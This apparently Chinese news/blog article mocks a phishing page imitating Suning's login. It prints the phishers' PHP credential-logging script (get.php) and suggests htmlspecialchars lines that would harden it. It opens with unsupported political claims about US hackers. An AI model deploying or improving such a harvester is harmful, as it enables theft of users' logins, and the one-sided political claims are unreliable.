首頁>資訊>

前幾天,美國政府機構遭受了大規模網路襲擊,川普直接甩鍋給俄羅斯的同時,順便抹黑我們中國。眾所周知,全球數美國駭客最為瘋狂,經常攻擊一些企業進行勒索,這一點美國朋友muriel也直言不諱,前不久富士康被攻擊就是最好的證據,連美國政府網也淪為他們的目標靶場。

該釣魚寫法只能算得上基礎入門,可就如此簡單的釣魚連結,在他們手裡也變成了垃圾。為何這樣說,下面我們一起來看看就知道原因了。 他們仿的是蘇寧頁面,之前也提過這種釣魚頁面製作很簡單,採集或者直接將蘇寧官網儲存,做一些修改並將提交資料的頁面替換掉,讓使用者解析自己指定的伺服器地址。這不是重點,重點是他們在偽連結時修改表單,提交獲取資料的檔案存在問題。 如下圖為蘇寧登入頁面:

get.php是他們獲取使用者提交賬號密碼所寫的頁面。也就是action資料提交的位置。

<?php$ref = $_SERVER['HTTP_PEFERER'];$today = date("F j, Y, g:i a");if(isset($_POST['name']) && !empty($_POST['name'])){$n = stripslashes($_POST['name']);$p = stripslashes($_POST[' password']);$content = $today . "--" .$ref ." 使用者名稱" . $n ." 密碼 " . $p;$filed = @fopen("get.txt" , "a+");@fwrite($filed, "$content\n");@fclose(filed);}?><html><head> <script type = "text/javascript">  function goBack(){   window.history.back()  } </script></head><body onload ="goBack()"></body></html>

雖然對獲取的資料做了過濾,但並沒有將其轉換成html。這也導致了他們想釣別人卻被別人釣的結果。應在原來的程式碼基礎上加上

$n=htmlspecialchars($n,ENT_QUOTES);$p=htmlspecialchars($p,ENT_QUOTES);

進行轉換。對於這種釣魚連結沒有任何的技術含量,連入門級都算不上。

4
最新評論
  • 購得日本70萬平方公尺小島的中國女子是誰?
  • 今年比較適合做的副業